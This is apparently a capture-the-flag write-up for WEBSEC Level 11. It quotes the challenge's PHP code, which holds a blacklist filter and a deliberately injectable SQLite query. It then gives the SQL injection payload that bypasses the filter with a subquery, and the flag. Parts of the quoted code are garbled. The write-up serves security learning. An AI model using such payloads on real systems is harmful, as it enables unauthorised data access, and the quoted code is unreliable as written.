WEBSEC Level 11

Challenge description

It's not AS simple AS it looks

Initial analysis

$special1 = ["!", "\"", "#", "$", "%", "&", "'", "*", "+", "-"]; $special2 = [".", "/", ":", ";", "<", "=", ">", "?", "@", "[", "\\", "]"]; $special3 = ["^", "_", "", "{", "|", "}"]; $sql = ["union", "0", "join", "as"]; $blacklist = array_merge (special1, special2, special3, sql);


if (isset ($_POST['submit']) && isset ($POST['user_id']) && isset ($_POST['table'])) {     $id = _POST[ʹuser_idʹ]; table = $POST['table'];
sanitize($id, $table);

$pdo = new SQLite3('database.db', SQLITE3_OPEN_READONLY);
$query = 'SELECT id,username FROM ' . $table . ' WHERE id = ' . $id;
//$query = 'SELECT id,username,enemy FROM ' . $table . ' WHERE id = ' . $id;

$getUsers = $pdo->query($query);
$users = $getUsers->fetchArray(SQLITE3_ASSOC);

$userDetails = false;
if ($users) {
    $userDetails = $users;
$userDetails['table'] = htmlentities($table);
}
}`

Walk through

STEP 1: Intercept in burp

STEP 2: user_id=2&table=costume&submit=Submit+Query OUTPUT: The hero number 2 in costume is Spiderman

STEP 3: id=2&table=(select 2 id, enemy username from costume)&submit=Submit+Query OUTPUT: The hero number 2 in (select 2 id, enemy username from costume)

Flag

FLAG: WEBSEC{Who_needs_AS_anyway_when_you_have_sqlite}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.

WEBSEC Level 11

Challenge description

Initial analysis

Walk through

Flag

OTHER POSTS